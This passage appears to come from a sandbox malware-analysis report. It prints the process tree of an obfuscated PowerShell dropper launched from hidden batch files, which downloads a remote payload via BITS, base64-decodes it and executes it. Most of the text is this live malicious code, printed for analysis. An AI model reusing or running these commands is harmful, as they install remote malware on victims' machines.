MurmDVina,eIndurs,krivtReprsiGir,lnOxysaa LevotCenteiKarbuoSjakbnGaunt Stat$ Ge,vIunlaurDatabiCo.indLeukoo,atroc .osiyHalo.tMorg.e erv ';.($amnigenia) (ordfattigere ',ppor$CycloI.jssorTilfriCal odOutc oQuerccLederybikintCarpeeAutol=Dent.$B.indeTempin,undhvfjort:Ondula Vgk.pIdo,ipLi eddHyl.ea .reetReincaCu,ub ') ;.($amnigenia) (ordfattigere 'P,oviIImpacmKvartp S aio,yperrIrreft Xant-DitzeMFrikvo As.rdsu eruPac.hlPapire ,ewf FrelsBVilmaiSel.ktdissesoxydeT,onearSenioaHygronDiddisCoun,fS,rmfeStetirDusti ') ;$Iridocyte=$Iridocyte+'\Passionful.Gen';while (-not $Flushingly) {.($amnigenia) (ordfattigere 'Teleo$ PolyFDronnlVacuouRi iksV,ndehVels.i ashn robrgPhlebl tapyVr.wi=Ekspe( P.nnTPhot.eBetjesEm.ratCholo-E strP mdenaUddantP nsihTrest Rec.r$N.ncoISloggrRutsciKrnked Ge,moKapitc GnawyBldnitForlaeHm,el)Skaar ') ;.($amnigenia) $Ansaa;.($amnigenia) (ordfattigere ' befoSOveretSylteaUkontr alystRaads-R mitSBonellAabyheTil ieNon,cpSkyla Supe,5Subca ');$Chiropompholyx=$Iconomatically[$Cirkusene++%$Iconomatically.count];}.($amnigenia) (ordfattigere 'Forma$Elef MAnisoaStocknMiljtdUnbashVulkaa In.uf .rantPamfliSlugvgFrumeeKosm, Taskl= umbe AbnorGDer oeHovedtCatac-MilieCFors,o BlehnTertit SkodekolponKalkutEpi,r Impar$InveiINa,err Mto.i,ushedBukkeo Hertc Ur ny.ygmetminc,e Akti ');.($amnigenia) (ordfattigere 'Ak.io$ ,ormCAuto.oOrbieuTndehnRubelt Tidse M grr Noraa heavdMolbovCarp.iMishac IncreTresp Wh t=R.tte garde[Pel,pSAb loyCosm ssup rt SlrueValmum ekli.EksplCFremmoSurann rundv Strae,niverDep at St.r]Bibli:,rkni:GraveFMaldorModa,oKapacm ThroBSkjala .arcs,ndgie kovb6Phth,4SnortSRindetImde rCrossi MetanUdspigMol h(Fes,r$ OutbMVinklaPo pinDesped Kickh voldaK,ncefArbejt NatuiProblg egnee Krig) Fri. ');.($amnigenia) (ordfattigere 'A,ela$Co,abJInroceRingkeHumanpDomineKnippdJungm ,alu=S,ids Overo[K,lymS pusly d,pusR,vestSashaePimplmBack..CollaTSk.ive De,oxSupertTrefa.ForsiE CasunNecescSuperoAgt.rdfait iHelepn Tredg Or h]Vr.is:Hvdin: BrneASmag,S CeleCTrosrI subtIPost,.DikteGTf,eneSmalstMinesSTalectMis.drQuinqiByfesnF,rmagrovdy( Unco$SynodCT lbao ,mpeuDisconprop,t gneere atrKonfea He,tdPodesvEst,riSt.enc Af,re.ssev) Vol, ');.($amnigenia) (ordfattigere 'Preco$ ersrre,eroMycteaDommes EnretSemip=nondi$S,ansJ E vreUimodeBedemp DickeF,lmtdFasci.Verdessc louSpgelbRejsesStriktJac.frShafti His,nAr cogTankl( ube3Apron1polyp9Blret2Hom,t7Risic9Bortf,Slutn2Parti4Linde7Mater0Ke,os8U,pmr)Bikse ');.($amnigenia) $roast;}"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aplbsz.bat" "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "++$rsonnementssts;++$rsonnementssts;$rsonnementssts=$rsonnementssts-1;Function Rubrikken ($Swings){$Toxiinfectious=5;$Toxiinfectious++;For($Programtransformationerne=5; $Programtransformationerne -lt $Swings.Length-1; $Programtransformationerne+=$Toxiinfectious){$Biskuiter = 'substring';$Undermarshalmen=$Swings.$Biskuiter.Invoke($Programtransformationerne, 1);$Mottoernes=$Mottoernes+$Undermarshalmen}$Mottoernes;}$Unaghast=Rubrikken ' T.abh.ummitGods tSoldapP.nkes del:Fumou/klod./MallekHalvkiMetapsSh.enabaa.dn StivbStenceBaghotKonceh ageraKanelk ubse.UnprecBomlroKadrem Hear/Dory K B od/ KaskU Foran ,ksiiUnbusvB.osleIdrtsrByldesPictuaNdve.l PsyclCuffis g trn K ntiKastin Bev,g Desae BrusnOrchi.seashlLystbpKa,jekPrior ';$interessanteste=$Unaghast.split([char]62);$Unaghast=$interessanteste[0];$Fascistizing=Rubrikken 'Bo,lei ShriePon.ox Su,c ';$Emulgatoren = Rubrikken 'Vovis\Sensis kakpyVrngbsK mpaw GrupoHove.wP,als6Contr4 U ti\saxonW metaiHemmenParapdcroisoPottewAn,uvsNicarPphilooKassewEjendeZinnnrQvvinSInobthIrrese End,lSvinglRykke\Afho vvalky1St.ng.Selec0P.osp\Ur gupIndjooJockewBol geMichar SailsMaaneh PokaeUdmarlStepblProto.RealleSyvaaxAnapteBrahm ';.($Fascistizing) (Rubrikken 'Pakto$Th,moOPhysopF,adesAmmieaK,rsfeParottV.branSmalfiF.lignN,nangCytomeferskrDet,a=Hornf$Do baeen.osnOutbuverg.t: EkskwMonuri Sulfn ,aasdModtoiTaktirHonno ') ;.($Fascistizing) (Rubrikken 'Unapp$vandrEM.ntamKamnau Aff,lFenacgEfteraBesottSpel.oRegntr P.raeInkonn refl=Afski$TacklOF.llap ynelsKla.eaA,iniePlasttMu,tanRrigeiAdvann ,ejegForlseSmertrSolsk+Peber$TelefEStridmSynthuT.leolFstebgDis,ya UligtOma.boNambarPopule un en,ooth ') ;.($Fascistizing) (Rubrikken 'Pr,ce$BemynLRke viSpirigOplagfpirataKnsdil alvdSigni Biri=Perso Cana(Myopl(Dro,ig.eggaw Fainm Dufti.aras Inconw hjf iMe,uknHarat3Skatt2Julea_UdplapKntrerNuc eoPrepocDr.vaerenovs Bults Ma,n elemo-Hom.vFFormi Pore,PEfterrExcano PortcChateeSlaves Shoes SolsIForandOutcl=Cheek$ Agap{Und rPArmvrILi,aeD Per }nagor)He,re.RevolC AddloMenn mGamonmDrista omsfnLinj,d loakLHyrdeiEnneanPlaideOverk)Enhed Sp rs-D,gmas BuldpSallolLackei I,mitRebo, Fore[FremfcAlderhTelena T,nnrDirek]Novel3 Kin,4Taxe ');.($Fascistizing) (Rubrikken 'Som.e$DavidSBullitpre,ha Fo syUdfrseHindbrB.syneSuper1Genve2Hvine8Ampho Vuln=N,nme Occup$CitraLEkskoiHemolgAndedfAviewaApocrlKalkudappre[Tiltu$K rakLKurosi Pon gper.sf FarcaDemislAdm,ndS lvr.F rstcInde,oBereguForlenThwortInd v- No b2Sensi]Helia ');.($Fascistizing) (Rubrikken 'Dokum$P,ogrPRykkeoSegremFo udaFllesrSpejliIndpruFustimAlf.s=.enne(CykelTmodareIncursRefamtEntro-StamgPKodenaSoloetstaveh Fanc Anra$VremaEzipstmPed.nuPersolStet,gTerebaLy,put N.rwoApok rSlgtseSeasonHelic)Amizi Spol,-IndgrASbettnNectadInter Anden(Ca,dl[SyncrILaystn agurt,ydroPhairdtGrapsr Sejl] Istn:Udsyr:UnlimshomefiNonoczLetfleNetvr Hepa-Horn,eae,loqOrles Vinke8Abtha)enzyg ') ;if ($Pomarium) {.$Emulgatoren $Stayere128;} else {;$Rotes=Rubrikken 'b rriST,ofetUngilaM.derr UdsktSbefa-Ado,iBKrabniStro tAf udsBythoTragour poeta .napnRempls AfbrfSmedeeFejnir ud s Rati -GranuSBarotoTomanuVarslrG ddacli,heeangaa Subco$r preUdagnanZoocuaB ancgAfskahTempeaCanthsN.ejatMe.od Ingen-OarsmDYachtePort sOptedtSam,ei PlainWellsaUargut BansiVizaroAntitna kom Chirn$R,tteOIncrypMhedes Reala P areBiblitAphronBela iUd.annAppetguklareGlde.rs,lvf ';.($Fascistizing) (Rubrikken ' Uend$reawoOGalvapCo,cusPreviaRin,seTaxaet Co,pnCaylei Afp.nOverdg BouieBrrenrVi en=borde$ RelueRakinnPhytovS vbr:BrnebaSynsvpE ilspPremudPri,laDeltitGastraEr co ') ;.($Fascistizing) (Rubrikken 'DegraISimonmCockepShippoStarsr VedhtMik,s- I,faMWitn o Pho.dMalatuBemgtlLucese Rici EmpanBDelibiSinastPlusks UnelTNonprrCantaaActinnbax es Co.tfPrompeNect rMicr, ') ;$Opsaetninger=$Opsaetninger+'\Biseksuelt67.Ker';while (-not $Misbehaviors) {.($Fascistizing) (Rubrikken 'Timod$ BranM.evoliEphe.s ncombForudeDiluvhSildeaRu.rav Pilii,ikhao FallrturbosCasso=Paali(wellhTU itee.ejeosFaksitLabor- racoPTransaG wket,egnihB,lly Tonet$LandbOZonelp icksPyxi,aMaurieChemitReto,nGeni i Hul,nA.racgly.skeA.sasrOplys).ookl ') ;.($Fascistizing) $Rotes;.($Fascistizing) (Rubrikken 'KohovSBltest AgnoaTransrGrundt Unsc- NidiSUntaclPropieHalvde SlutpLodem ,rund5Misro ');$Unaghast=$interessanteste[$Gemmologisk++%$interessanteste.count];}.($Fascistizing) (Rubrikken 'Chiro$RabbiOSe,lrpFrav,lBrancs forunFejlriPaulonPodopgI.exhs RevisInkastA.todeUdskrmSangemMozose CosmrForden.enneeSkreksPolyr3Norme2.emis Omdel=Glago re,roGTh,rmemoldytVe ti-GyredCDyvleoRa ikn Ste tKerameFas.inFosiet Isol Henr $NailsOOpp.ipParalsSkyldaKumpaeUdbyttBeatan T,mii PetinPolysgMastieTo.akrPhall ');.($Fascistizing) (Rubrikken 'T tan$CitroFDailkoNavrsrDisavs Kelpa Pse,m Unp,l bl diNeokontibiog.ugans Fuths TentaInfralSupereZinnis,oled Inte.=Hjemm Faseu[PasanSFedtly.lektsReguit,efinefrugtmCerem. ResrC slutoUnexan Phy.vInduseFdegorTri,mtPat e]Elast:Coun.:LitteF vildr ieveo F rsmtobogBSe,araRefles Hor ewatt.6Spytt4HowleS Bo,bt.ankor Tilki P eanAf,kngSkarn(.agsi$ForfrOGodtgp Ces.lSeismsForlgnBast.i P.evnCost,gBrugss Ba dstimbrtM,xiteBevgemI,rtsmEllsaeBlndlrt.nalnAntiaeContrs fort3Disco2Unsy )Listl ');.($Fascistizing) (Rubrikken ' Vest$SrbehMUn atoH,laununderoRecippPoplih si gt,allehente,o,mbosnPralsgWastri ClouzBrigaeDisked,tten No ty= Unpr Typot[ amelSKom,lyForetsBypl tDysaeeKgr.mmbtfin.Na olTFyrskeSpecixFri,utInduc.AffekEBrooknStyrkcAcet oByfesdAger iEditenCloppgsmier]Telo,:,itro:ZonopAHvid STilsyC LoyaIDenatIImbri.FlannGFarteeU multUdsveSCh,litUroror Di si Man.nNu,ifgNegqt( Grup$ aabnFMinuso.luttrGainlsCampaaU cerm fsel Bronidip,yn termgNon,rsBirdbs abyla SparlUnhomeUnhalsUnder)Compe ');.($Fascistizing) (Rubrikken 'Forvi$ TeleWForcioad ploMictud AutoeHoteln.umblePengerDmtal=Efter$Kar,lMUnderoM,celnClubso Verip F.sshSemittBer ghStemmoTankenangusgslettiBoredzV,rmeeSwi,md Bili.IntersKeoutuPluddbAfviksAnordt SluirSjlfuiAffixnepiphgCiffe(Sav.l3Udfly0Disko2quadr7Typha4Krukk5 kast,manur2Abede5,oebl3Bojit1Betas1Lign,)Obser ');.($Fascistizing) $Woodener;}"4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$rsonnementssts;++$rsonnementssts;$rsonnementssts=$rsonnementssts-1;Function Rubrikken ($Swings){$Toxiinfectious=5;$Toxiinfectious++;For($Programtransformationerne=5; $Programtransformationerne -lt $Swings.Length-1; $Programtransformationerne+=$Toxiinfectious){$Biskuiter = 'substring';$Undermarshalmen=$Swings.$Biskuiter.Invoke($Programtransformationerne, 1);$Mottoernes=$Mottoernes+$Undermarshalmen}$Mottoernes;}$Unaghast=Rubrikken ' T.abh.ummitGods tSoldapP.nkes del:Fumou/klod./MallekHalvkiMetapsSh.enabaa.dn StivbStenceBaghotKonceh ageraKanelk ubse.UnprecBomlroKadrem Hear/Dory K B od/ KaskU Foran ,ksiiUnbusvB.osleIdrtsrByldesPictuaNdve.l PsyclCuffis g trn K ntiKastin Bev,g Desae BrusnOrchi.seashlLystbpKa,jekPrior ';$interessanteste=$Unaghast.split([char]62);$Unaghast=$interessanteste[0];$Fascistizing=Rubrikken 'Bo,lei ShriePon.ox Su,c ';$Emulgatoren = Rubrikken 'Vovis\Sensis kakpyVrngbsK mpaw GrupoHove.wP,als6Contr4 U ti\saxonW metaiHemmenParapdcroisoPottewAn,uvsNicarPphilooKassewEjendeZinnnrQvvinSInobthIrrese End,lSvinglRykke\Afho vvalky1St.ng.Selec0P.osp\Ur gupIndjooJockewBol geMichar SailsMaaneh PokaeUdmarlStepblProto.RealleSyvaaxAnapteBrahm ';.($Fascistizing) (Rubrikken 'Pakto$Th,moOPhysopF,adesAmmieaK,rsfeParottV.branSmalfiF.lignN,nangCytomeferskrDet,a=Hornf$Do baeen.osnOutbuverg.t: EkskwMonuri Sulfn ,aasdModtoiTaktirHonno ') ;.($Fascistizing) (Rubrikken 'Unapp$vandrEM.ntamKamnau Aff,lFenacgEfteraBesottSpel.oRegntr P.raeInkonn refl=Afski$TacklOF.llap ynelsKla.eaA,iniePlasttMu,tanRrigeiAdvann ,ejegForlseSmertrSolsk+Peber$TelefEStridmSynthuT.leolFstebgDis,ya UligtOma.boNambarPopule un en,ooth ') ;.($Fascistizing) (Rubrikken 'Pr,ce$BemynLRke viSpirigOplagfpirataKnsdil alvdSigni Biri=Perso Cana(Myopl(Dro,ig.eggaw Fainm Dufti.aras Inconw hjf iMe,uknHarat3Skatt2Julea_UdplapKntrerNuc eoPrepocDr.vaerenovs Bults Ma,n elemo-Hom.vFFormi Pore,PEfterrExcano PortcChateeSlaves Shoes SolsIForandOutcl=Cheek$ Agap{Und rPArmvrILi,aeD Per }nagor)He,re.RevolC AddloMenn mGamonmDrista omsfnLinj,d loakLHyrdeiEnneanPlaideOverk)Enhed Sp rs-D,gmas BuldpSallolLackei I,mitRebo, Fore[FremfcAlderhTelena T,nnrDirek]Novel3 Kin,4Taxe ');.($Fascistizing) (Rubrikken 'Som.e$DavidSBullitpre,ha Fo syUdfrseHindbrB.syneSuper1Genve2Hvine8Ampho Vuln=N,nme Occup$CitraLEkskoiHemolgAndedfAviewaApocrlKalkudappre[Tiltu$K rakLKurosi Pon gper.sf FarcaDemislAdm,ndS lvr.F rstcInde,oBereguForlenThwortInd v- No b2Sensi]Helia ');.($Fascistizing) (Rubrikken 'Dokum$P,ogrPRykkeoSegremFo udaFllesrSpejliIndpruFustimAlf.s=.enne(CykelTmodareIncursRefamtEntro-StamgPKodenaSoloetstaveh Fanc Anra$VremaEzipstmPed.nuPersolStet,gTerebaLy,put N.rwoApok rSlgtseSeasonHelic)Amizi Spol,-IndgrASbettnNectadInter Anden(Ca,dl[SyncrILaystn agurt,ydroPhairdtGrapsr Sejl] Istn:Udsyr:UnlimshomefiNonoczLetfleNetvr Hepa-Horn,eae,loqOrles Vinke8Abtha)enzyg ') ;if ($Pomarium) {.$Emulgatoren $Stayere128;} else {;$Rotes=Rubrikken 'b rriST,ofetUngilaM.derr UdsktSbefa-Ado,iBKrabniStro tAf udsBythoTragour poeta .napnRempls AfbrfSmedeeFejnir ud s Rati -GranuSBarotoTomanuVarslrG ddacli,heeangaa Subco$r preUdagnanZoocuaB ancgAfskahTempeaCanthsN.ejatMe.od Ingen-OarsmDYachtePort sOptedtSam,ei PlainWellsaUargut BansiVizaroAntitna kom Chirn$R,tteOIncrypMhedes Reala P areBiblitAphronBela iUd.annAppetguklareGlde.rs,lvf ';.($Fascistizing) (Rubrikken ' Uend$reawoOGalvapCo,cusPreviaRin,seTaxaet Co,pnCaylei Afp.nOverdg BouieBrrenrVi en=borde$ RelueRakinnPhytovS vbr:BrnebaSynsvpE ilspPremudPri,laDeltitGastraEr co ') ;.($Fascistizing) (Rubrikken 'DegraISimonmCockepShippoStarsr VedhtMik,s- I,faMWitn o Pho.dMalatuBemgtlLucese Rici EmpanBDelibiSinastPlusks UnelTNonprrCantaaActinnbax es Co.tfPrompeNect rMicr, ') ;$Opsaetninger=$Opsaetninger+'\Biseksuelt67.Ker';while (-not $Misbehaviors) {.($Fascistizing) (Rubrikken 'Timod$ BranM.evoliEphe.s ncombForudeDiluvhSildeaRu.rav Pilii,ikhao FallrturbosCasso=Paali(wellhTU itee.ejeosFaksitLabor- racoPTransaG wket,egnihB,lly Tonet$LandbOZonelp icksPyxi,aMaurieChemitReto,nGeni i Hul,nA.racgly.skeA.sasrOplys).ookl ') ;.($Fascistizing) $Rotes;.($Fascistizing) (Rubrikken 'KohovSBltest AgnoaTransrGrundt Unsc- NidiSUntaclPropieHalvde SlutpLodem ,rund5Misro ');$Unaghast=$interessanteste[$Gemmologisk++%$interessanteste.count];}.($Fascistizing) (Rubrikken 'Chiro$RabbiOSe,lrpFrav,lBrancs forunFejlriPaulonPodopgI.exhs RevisInkastA.todeUdskrmSangemMozose CosmrForden.enneeSkreksPolyr3Norme2.emis Omdel=Glago re,roGTh,rmemoldytVe ti-GyredCDyvleoRa ikn Ste tKerameFas.inFosiet Isol Henr $NailsOOpp.ipParalsSkyldaKumpaeUdbyttBeatan T,mii PetinPolysgMastieTo.akrPhall ');.($Fascistizing) (Rubrikken 'T tan$CitroFDailkoNavrsrDisavs Kelpa Pse,m Unp,l bl diNeokontibiog.ugans Fuths TentaInfralSupereZinnis,oled Inte.=Hjemm Faseu[PasanSFedtly.lektsReguit,efinefrugtmCerem. ResrC slutoUnexan Phy.vInduseFdegorTri,mtPat e]Elast:Coun.:LitteF vildr ieveo F rsmtobogBSe,araRefles Hor ewatt.6Spytt4HowleS Bo,bt.ankor Tilki P eanAf,kngSkarn(.agsi$ForfrOGodtgp Ces.lSeismsForlgnBast.i P.evnCost,gBrugss Ba dstimbrtM,xiteBevgemI,rtsmEllsaeBlndlrt.nalnAntiaeContrs fort3Disco2Unsy )Listl ');.($Fascistizing) (Rubrikken ' Vest$SrbehMUn atoH,laununderoRecippPoplih si gt,allehente,o,mbosnPralsgWastri ClouzBrigaeDisked,tten No ty= Unpr Typot[ amelSKom,lyForetsBypl tDysaeeKgr.mmbtfin.Na olTFyrskeSpecixFri,utInduc.AffekEBrooknStyrkcAcet oByfesdAger iEditenCloppgsmier]Telo,:,itro:ZonopAHvid STilsyC LoyaIDenatIImbri.FlannGFarteeU multUdsveSCh,litUroror Di si Man.nNu,ifgNegqt( Grup$ aabnFMinuso.luttrGainlsCampaaU cerm fsel Bronidip,yn termgNon,rsBirdbs abyla SparlUnhomeUnhalsUnder)Compe ');.($Fascistizing) (Rubrikken 'Forvi$ TeleWForcioad ploMictud AutoeHoteln.umblePengerDmtal=Efter$Kar,lMUnderoM,celnClubso Verip F.sshSemittBer ghStemmoTankenangusgslettiBoredzV,rmeeSwi,md Bili.IntersKeoutuPluddbAfviksAnordt SluirSjlfuiAffixnepiphgCiffe(Sav.l3Udfly0Disko2quadr7Typha4Krukk5 kast,manur2Abede5,oebl3Bojit1Betas1Lign,)Obser ');.($Fascistizing) $Woodener;}"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uwhion.bat" "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "++$Equipping;++$Equipping;$Equipping=$Equipping-1;Function Geranial ($Usherance){$Kommandodelene=5;$Kommandodelene++;For($Allentando=5; $Allentando -lt $Usherance.Length-1; $Allentando+=$Kommandodelene){$Disassembles = 'substring';$Overfladebehandlende=$Usherance.$Disassembles.Invoke($Allentando, 1);$Fulde=$Fulde+$Overfladebehandlende}$Fulde;}$Arbejdsdatabaser=Geranial ',erlihTaraptSuppotguzzlpNu.elsKa es: .ond/,enpa/Sste,kCtenoiForp,s.remaaDeltinTransbepit eFrysetSkidehProduaU.clokIrra,.ElastcRaadso Dom,mAfsk,/LivsfKB okl/Plur.f OpspnF egnb Blinl Trang In tn .runiMiljbnI morg.eglleSkavanSprjt. AudapBegrocTekstxGra t ';$Grundejerne=$Arbejdsdatabaser.split([char]62);$Arbejdsdatabaser=$Grundejerne[0];$Genforeningsfest=Geranial 'L,epriSp nde RiddxP.lic ';$Transfereringernes = Geranial ' einj\PenibsDeduky bespsAar,rwEj ndo dipewBuiro6Infor4A boy\ UdkrWFaldgi FungnSkattdno esoBan,fwPaleosRe,liP Feu.o,reopw Ko me QuadrAle,bSPre shMon,re.oluml Re,bl,ende\An.huv Best1Melog.Prjse0Naph.\Ekstep Saneo Be,awbrotheRealsrAmtslsBiroshCharoe OptrlSemitlMo.gn..omnaeUnderx CorpeTryll ';.($Genforeningsfest) (Geranial 'Lingu$InsolFJacoboPolinrGravatImmuniUn mpeEjendsIncen=Tilsk$NybbleAppron N nfvPersi: S,umwUrosii Und nDagbodBrighiHovedrUdrig ') ;.($Genforeningsfest) (Geranial 'Pseud$ SlvmT Lu.srin.alaHistonBremssSal,mfSl.tteHyperrVog ee S,rarAdulaiAfglanC.vergN.nreeRaadnr .aronUnunieD.gbdsLazza= Fert$KommuFpaccaoElemer .ngltSkalmiBnd.leEpicosCu at+Phosp$eumenT HobbrSuperaBandonun,oosHeliofHalloeDatamrOverseBladnrUnr.liFlakknStat.gBulneeGa,lor ForhnRets.e Pha sAdspr ') ;.($Genforeningsfest) (Geranial 'Synon$K rriuMo ybnIamb.pUdrivrSomnao se,ibild,taAgenttAnbefi Sle oSyngenExcusaWarunl .asc Medit=Tisty Kontr( Styl( EchogUngu,wPosedmBe deiJ,ggl Cale,wGla.ziKo menSifse3App,a2Ad,ok_Hagiop S,rarSamfuoGiftecFresce ParasPrevasSpi,d Pusl- IndvF Tewe DamalPFufflrBanyao ouccBr ndeNaestsPal,asDetacI H gedb ser=Bagdr$Slagg{LemogPUnexpIOut.iDRubet} Juni)Forva.WhimsCLibanoSignimOr.ctmMis iaAnlgenHand dScrubLKegleiPuckrnFagvieHauge)Herpe Broma-BiblisCentrpGrosslOptomiK kketCoext Edite[Pu ilcGe,rdhTae iaSpnderHa,al] P ol3G.und4Solso ');.($Genforeningsfest) (Geranial 'pjask$DevouiPropanDisapdJydesrS,redeSdvantAirshnScragiSpa enInhalggambi Daugh=Up.oa Opd,$.piphuCiv.ln DecrpOverrr Nordo Dy,wbInforaPerhytParisiForaaoLudfanalbumaRdse.lamant[Pl.ve$Strafu AmernXanthpGej trRegnsoScolybBlom.aFor ytUnshai Mor.oSammen Powna Broml,acch.vanddc Mu.fome.fou K.rvnLiv.ltSyge.- Reng2Fo,ty]Velan ');.($Genforeningsfest) (Geranial 'godke$b,rbaP rachrEurypi J sto RhetnbarraoTarifdBruneeUnd,tsU kylmPhaenaVictoc CrimeMigrao ri su.oplosdukse=Pa an(DisdeTFodreeDelafs .ndrtMonog-UnivePPhytiaLs intSp.tth Sten Wame$R bedT Alb,rZy,nea OvernComplsv.rknfSmkkee Tingr .onpeSpidsrSi pliBankonCeraugAlvuse G ldrTritinHjtrye SerrsFluor)Under Peppe-FigurABesttn rigidUklde u sy(Opmar[Flue.IPnhednFo git HrfrPOverptBowlirOutfi]Flabb:Datat:A,tonsFilifiAnsvazUdvlge Poyo Anise- IndsePancrqProli Fe.no8Mi,ns) Pr.b ') ;if ($Prionodesmaceous) {.$Transfereringernes $indretning;} else {;$forktret=Geranial ' Po yS St,rtRaffiaL.botr Paakt Stam-tall.BHeteriUnititappelsGrubeTSp akrInde,aPacifnMask.s DjvefUnwoeeVersirT.gnk So ub-GalloSQuat oS irruMatrorKldnic Li teCo.in Buff$ .ossA spurrTrib bCystaeOver,jDemoudTaxi s ommud F lmaTibettTermiaFamlebPost aFor.rs .ppreF.otgrCop.s Bepim-TritoD Kon eKnebrs Formt Unifi.arhon GasiaActiftBirthi Sub,oCamelnBvred Fiddl$orchiFu.heaodi,plrNonflt.qualiTe,ree P,acsAceti ';.($Genforeningsfest) (Geranial 'Bl.kk$Sal sF KonjoInde r UnfutHandliTvae eRk,bisSused= A nd$Renume,ensonE,rphvCoupe:QsupeaAtomkpOmfatpKagesdOutstaPageut SrgeaJerea ') ;.($Genforeningsfest) (Geranial 'SpillINegatmS inkp ndotoForesrLimintOverc- SpilMkennyo VestdGenneuLovbrlPla.eeIriar TilraBbassei.ompltProudsPetr,TTypesrSkrmsa HeinnUdbygsHjlpefI.ioceBiblirPrvek ') ;$Forties=$Forties+'\Pelecypod.Fru';while (-not $Garantifonde) {.($Genforeningsfest) (Geranial 'Moari$DrejeG.ogara Ce hrRat,oaSpgelnNonmatVildti Rentf,ekjeoForaanRejnedbandie,ypno=Gadit(SlurkTVadpae Ass.sUdsultAr.ll-UnderP.ivsfaKnogltOsierhMaler Doks$Non.hF ,oveoWin crLiquetkompeip,nglePokomsSky l)Lrely ') ;.($Genforeningsfest) $forktret;.($Genforeningsfest) (Geranial ' K taSM ddetMakedaHervrrRunddt Ha.m- CompSGunf.lOverbeTho.leCod,tpHyper Ferie5Totur ');$Arbejdsdatabaser=$Grundejerne[$Alangium++%$Grundejerne.count];}.($Genforeningsfest) (Geranial 'Under$Dio.eHIbrugaApplipTffe.lKassee AnstsUnorgsWoodcnKr,gseSchaps Udsks Fo.t N.rm=disal LarynGsl,ndeKommatBetal-omstdC Undeo Gro,nEtatst mejeeDistrnAntictFlles Ribbe$UopdrFIntr.oAudiorAlebitPala i sculef,skesDicer ');.($Genforeningsfest) (Geranial 'Enar.$ Hul,OAerobuTranst calosSculpkIntrai Hypep WearpUhensiAvl,hnSociagSynd Super=L.uco Quind[.ingeSSladdyPalmysUnd,rtun raehu,idmBilas.S.rjtC.eftaoIntranGoitev.exiceKemotrAnep,tT.vtb] Sc l:Tilba:CacopFB,nzarkongeoTaxacmSimshBChowra Compscombie Over6to,ed4Brod,Sirresttrnerr TrypiBeguinlifebgLat.i(Canne$AbsolHskjora Opl,pconfrlFrekveTerapsEfemesHolm nAmbuleKommusRep,gsent.s)Terri ');.($Genforeningsfest) (Geranial 'Indda$B,rgaPKlikeoR,ttelM,ltiyEctypp xteraMyalgg RevaeEnaa,dVriml Gymna= Gram Bygg[hovedSH,rtiyBlennsabasetSk,lee.rstemsewar.Uda.nTRedwie Gardx UdsptColor.Rrl.dEAb rtnSkreecLinguoSkylid Keldi Alfun RepagScoop]Su.pa:Kinet:SupprAFodgaS,haptCTestrIFejltIsnowi. SepaGGodheeBiophtPrefeSOssuat,hlorrAdganiWappen K njg I,dk(Pauli$KiropODroscuParamt.ittesTe.etkpligtiHumilpTerotpacrodiGr,sanHn,epg Eter) Adly ');.($Genforeningsfest) (Geranial 'Efeue$StatsSAccremun,aik TrapkOryzieKlororTopogsAccul1Metro3Ddni.6K,lde= Gian$ClearPHreviocontelBoligySjalsp R,suaS,mihgPr,ppe ,icad Fr,n.oscilsFolkeuForfabCurbss KroktFo berApproiRetrin EolngZaphr(Dispr2Qui k9So er1befri7U.skr8Bgre.8 Espa,S,lid2Havel4Di pl8 Opsk3Usabl7Gipsy)Deice ');.($Genforeningsfest) $Smkkers136;}"4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Equipping;++$Equipping;$Equipping=$Equipping-1;Function Geranial ($Usherance){$Kommandodelene=5;$Kommandodelene++;For($Allentando=5; $Allentando -lt $Usherance.Length-1; $Allentando+=$Kommandodelene){$Disassembles = 'substring';$Overfladebehandlende=$Usherance.$Disassembles.Invoke($Allentando, 1);$Fulde=$Fulde+$Overfladebehandlende}$Fulde;}$Arbejdsdatabaser=Geranial ',erlihTaraptSuppotguzzlpNu.elsKa es: .ond/,enpa/Sste,kCtenoiForp,s.remaaDeltinTransbepit eFrysetSkidehProduaU.clokIrra,.ElastcRaadso Dom,mAfsk,/LivsfKB okl/Plur.f OpspnF egnb Blinl Trang In tn .runiMiljbnI morg.eglleSkavanSprjt. AudapBegrocTekstxGra t ';$Grundejerne=$Arbejdsdatabaser.split([char]62);$Arbejdsdatabaser=$Grundejerne[0];$Genforeningsfest=Geranial 'L,epriSp nde RiddxP.lic ';$Transfereringernes = Geranial ' einj\PenibsDeduky bespsAar,rwEj ndo dipewBuiro6Infor4A boy\ UdkrWFaldgi FungnSkattdno esoBan,fwPaleosRe,liP Feu.o,reopw Ko me QuadrAle,bSPre shMon,re.oluml Re,bl,ende\An.huv Best1Melog.Prjse0Naph.\Ekstep Saneo Be,awbrotheRealsrAmtslsBiroshCharoe OptrlSemitlMo.gn..omnaeUnderx CorpeTryll ';.($Genforeningsfest) (Geranial 'Lingu$InsolFJacoboPolinrGravatImmuniUn mpeEjendsIncen=Tilsk$NybbleAppron N nfvPersi: S,umwUrosii Und nDagbodBrighiHovedrUdrig ') ;.($Genforeningsfest) (Geranial 'Pseud$ SlvmT Lu.srin.alaHistonBremssSal,mfSl.tteHyperrVog ee S,rarAdulaiAfglanC.vergN.nreeRaadnr .aronUnunieD.gbdsLazza= Fert$KommuFpaccaoElemer .ngltSkalmiBnd.leEpicosCu at+Phosp$eumenT HobbrSuperaBandonun,oosHeliofHalloeDatamrOverseBladnrUnr.liFlakknStat.gBulneeGa,lor ForhnRets.e Pha sAdspr ') ;.($Genforeningsfest) (Geranial 'Synon$K rriuMo 